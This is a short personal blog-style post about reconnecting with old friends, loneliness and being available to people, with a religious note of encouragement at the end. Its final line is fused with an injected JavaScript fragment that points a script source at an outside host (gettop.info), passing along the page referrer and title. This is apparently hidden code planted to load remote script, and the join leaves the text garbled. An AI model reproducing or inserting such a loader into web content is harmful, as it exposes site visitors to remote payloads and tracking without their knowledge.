Recently, I did a personal review of my relationship with friends from way back and for most of them, we’ve been largely out of touch. I have a justifiable busy schedule, but in thinking about it, I realized that at the end of the day, what matters after all is said and done is the impact we have made on the lives of people we get in touch with.
You know what I realized? These days, some of those people don’t feel as comfortable getting in touch because they believe I’m ‘up there’ and not very reachable; and for many of them, they would love to confide in and share some personal issues with me.
I’ve been reaching out to some of these people, younger, colleagues and older. I called one of them today and he spoke about how lonely it’s been for him (he lives in another country) and how he needed to speak with someone about 3 weeks ago but he didn’t have anyone to talk to. Having someone to connect with, whether in good and bad times is vital.
I once saw a quote somewhere about friendship, “Friendship is not a big thing, it’s a million little things”. As simple as friendship looks, the effect is altogether extremely important.
So, if you’re my person from way back or now and you need to get my attention, please do all you can to get it. God helping me, just call my name, and I’ll be there……. 🙂
I’m excited about the new week because God is in control! Get excited too!s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;
